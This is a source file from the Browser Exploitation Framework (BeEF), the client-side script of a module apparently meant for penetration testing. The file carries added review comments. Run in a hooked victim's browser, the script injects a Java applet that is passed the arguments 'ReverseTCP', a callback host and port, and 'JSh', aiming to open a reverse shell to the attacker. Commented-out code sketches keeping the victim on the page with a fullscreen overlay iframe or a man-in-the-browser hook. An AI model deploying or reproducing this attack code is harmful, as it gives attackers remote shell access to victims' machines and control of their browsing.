Path: blob/master/modules/exploits/local_host/java_payload/command.js
//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

// Client-side half of the java_payload command module.
//
// Runs inside the hooked page via beef.execute. The `<%= ... %>` placeholders are
// ERB expressions filled in server-side by the module's Ruby counterpart before this
// script is delivered; nothing here validates them client-side, so their values are
// whatever the server-side module produced.
//
// What this script does, in order:
//   1. builds the URL of the applet JAR (applet_archive) from the beef.net connection
//      fields, i.e. the JAR is fetched from the same host/port the hook talks to;
//   2. attaches a Java applet to the DOM with beef.dom.attachApplet, passing a
//      positional argument list to the 'javapayload.loader.AppletLoader' class;
//   3. reports back to the server with beef.net.send once the element is in the DOM
//      (this only confirms DOM insertion, not that the applet actually ran -- see the
//      TODOs below).
//
// Side effects observable from the page: one <applet> element added to the DOM, one
// HTTP fetch of applet_archive, one beef.net.send callback to <%= @command_url %>.
beef.execute(function() {

// NOTE(review): `conn` is assigned from the template but never read in this function;
// the connection type passed to the applet below is the hard-coded literal 'ReverseTCP'
// (arg0). Either the Ruby side's @conn is dead, or arg0 was meant to use it -- confirm.
var conn = '<%= @conn %>';
var cbHost = '<%= @cbHost %>';
var cbPort = '<%= @cbPort %>';
// URL of the applet JAR, served by the BeEF server itself (same scheme/host/port the
// hook uses); the '/anti.jar' path is fixed here.
var applet_archive = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/anti.jar';
var applet_id = '<%= @applet_id %>';
var applet_name = '<%= @applet_name %>';

// The last argument is a one-element array of applet <param> name/value pairs. 'argc'
// declares how many argN entries follow; the order arg0..arg4 is positional and is
// consumed by the loader class, so it must not be reordered. cbHost/cbPort are the
// template-supplied strings above (no quoting or validation is applied to them here).
beef.dom.attachApplet(applet_id, applet_name, 'javapayload.loader.AppletLoader',
null, applet_archive, [{'argc':'5', 'arg0':'ReverseTCP', 'arg1':cbHost, 'arg2':cbPort, 'arg3':'--', 'arg4':'JSh'}]);


//TODO: modify the applet in a way we can call a method from it, or create a Javascript variable in the page (to know the applet has started).
//TODO: after that, every N seconds we'll check if the user RUN the applet, otherwise we remove the applet and inject another one.


//TODO: =========== persistence techniques ===========
// the victim must stay on the page while the applet is running. we don't want to use hybrid techniques to
// download platform dependent executable (i.e. meterpreter) and then kill the applet.
// we have 2 options:
// 1. use the MITB code (currently doesn't work on IE)
// 2. create an overlay iFrame while having the applet runnin in the background
//
// 1. setTimeout(beef.dom.createIframe('fullscreen', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null), 4000);
// 2. beef.mitb.init("<%= @command_url %>", <%= @command_id %>);
// var MITBload = setInterval(function(){
// if(beef.pageIsLoaded){
// clearInterval(MITBload);
// beef.mitb.hook();
// }
// }, 100);


// Reporting: this fires as soon as attachApplet returns, so the status message only
// means the element was inserted. Whether the JAR was fetched, the applet was allowed
// to run, or the user approved it is not known at this point.
beef.debug('[Java Payload] Applet with id[' + applet_id + '] added to the DOM.');
// NOTE(review): @command_id is emitted unquoted, i.e. the server-side template is
// expected to render a bare numeric literal here; a non-numeric value would be a
// syntax error in the delivered script -- confirm the Ruby side always passes an integer.
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet with id[' + applet_id + '] added to the DOM.');


});